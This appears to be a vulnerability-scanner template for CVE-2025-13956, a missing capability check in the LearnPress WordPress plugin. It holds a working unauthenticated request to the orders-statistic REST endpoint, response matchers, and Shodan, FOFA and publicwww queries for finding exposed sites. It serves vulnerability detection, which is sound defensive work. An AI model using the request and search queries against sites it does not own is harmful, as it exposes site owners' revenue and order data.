id: CVE-2025-13956 info: name: LearnPress < 4.3.2 - Broken Access Control author: pussycat0x severity: medium description: | The LearnPress – WordPress LMS Plugin plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the statistic function in all versions up to, and including, 4.3.1. This makes it possible for unauthenticated attackers to view the plugin's orders statistics, including total revenue summaries and order status counts. impact: | Unauthenticated attackers can view sensitive order statistics including revenue and order status, leading to information disclosure. remediation: | Update to a version later than 4.3.1 or the latest available version. reference: - https://wpscan.com/vulnerability/b4c0e309-45d1-4b00-875d-ec8a76910253/ - https://nvd.nist.gov/vuln/detail/CVE-2025-13956 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2025-13956 epss-score: 0.00917 epss-percentile: 0.56614 cwe-id: CWE-862 metadata: verified: true max-request: 1 vendor: thimpress product: learnpress framework: wordpress publicwww-query: "/wp-content/plugins/learnpress/" fofa-query: body="/wp-content/plugins/learnpress/" shodan-query: http.html:"/wp-content/plugins/learnpress/" tags: cve,cve2025,wordpress,wp-plugin,wp,learnpress,exposure http: - method: GET path: - "{{BaseURL}}/wp-json/lp/v1/orders/statistic" matchers: - type: dsl dsl: - 'contains_any(body, "total-raised", "order-completed", "order-pending", "order-cancelled", "Total Raised")' - 'contains(body, "status\":\"success")' - 'contains(header, "application/json")' - 'status_code == 200' condition: and # digest: 4b0a00483046022100a550657a2122a83c0bef22edd1bb2d6252925c041b1624ee75d139d2ca687fd3022100c3a19af1c3baaee4255dfd14a1f6fcd3960e7c41726a04034d8bee4d06d45108:922c64590222798bb761d5b6d8e72950